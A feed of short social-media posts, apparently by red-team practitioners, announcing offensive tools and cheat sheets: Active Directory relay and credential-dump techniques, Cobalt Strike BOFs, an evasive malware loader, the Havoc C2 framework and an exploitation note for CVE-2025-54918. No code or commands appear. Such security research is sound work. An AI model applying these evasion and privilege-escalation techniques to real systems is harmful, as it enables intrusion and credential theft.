It had been a while since I last updated my #CheatSheets: - AORTA - DMSA - GPP/O hijacking - MSSQL/GPOHound, gpoParser - NTLM and Kerberos attacks (relay, CVE, RemoteMonologe, ...) - Creds dump and many new NXC modules - SCCM / MDT stuffs - A new NFS page https://t.co/41oK5sXkiT

New BOF to run native PE in the Cobalt Strike beacon without console allocation or pipe creation. Like BOF_Spawn, this BOF is malleable with proxy/spoof for LoadLibraryA, allocation methods (Heap, VirtualAlloc, Module Stomping) and some other tweaks :) https://t.co/19PX3WHB40

🚀 Introducing MoxPack: A template builder for Proxmox using Packer. Generate Windows & Linux VM templates with cloud-init support and sysprep. Ideal for lab automation and infra-as-code. https://t.co/ewTGY6NqIU

Meet PhantomTask — a tiny Rust CLI that creates and executes Windows Task Scheduler jobs with session hijacking. Enumerate sessions, elevate, pass creds, trigger now. Everything with WinAPI and direct COM interactions. Repo:

Small update on "printerbugnew:" added a description of how to exploit CVE-2025-54918: DCs running 2025 allow reflection RPC->LDAPS - from a standard user to DA before patch😃

MaldevAcademyLdr.2: https://t.co/P3joCJU3Rs Key Features: - Steganography - Thread stack spoofing - Hiding PE payload in GPU memory - Syscall tampering using the Trap Flag - Full list of features available in the README

I have just finished an update on WDSFinder, right before my rump at @WineRump : WDSFinder now supports LDAPS with Channel Binding, and LDAP with Session Signing enforced! The code may also prove useful for those trying to use these protocols in Rust.✌️ https://t.co/KpQpVUbWru

See you there 🤞

Thanks @SentinelOne for the gift 😄

Introducing Havoc Professional: A Lethal Presence We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth! https://t.co/0aPVihoFIU

Additionally, I have coded a little tool to automate the detection of these shares:

Some weeks ago, @TrustedSec has posted a really interesting blog post about the MDT shares, and credentials that can be found inside. But one question remained unanswered: where are they? I have tried to answer this question: https://t.co/iG5l6FLji8

Currently, if this patch is not deployed in an Active Directory, anyone with a user account is able to takeover any assets, except for DC, by default!

Things are getting serious!

If you thought phishing was now ineffective, you may have missed something 👀 My latest post highlights the advanced tactics used to bypass security controls and deceive even the most savvy users. Check it out ⤵️

I've just completed the @MalDevAcademy Malware Development Course. The course presents modern techniques for bypassing security solutions, low-level development and evasion. I would totally recommend this course to Red Team operators requiring a high level of discretion!

Kerberos relay on The Hacker Recipes, brought to you by @BlWasp_ 💪

Just finished to refactor my network #pivoting cheatsheet! If you are in an internal engagement, and you're stuck on a pivot, perhaps the solution will lie there: https://t.co/nOJapJmz6J

Following the recent @Synacktiv 's article about abusing WebClient authentications from multicast poisoning, I have made a quick PR on Responder to simplify the setup:

Make Bloodhound Cool Again: Migrating Custom Queries from Legacy BloodHound to BloodHound CE https://t.co/Oza7NOvCA2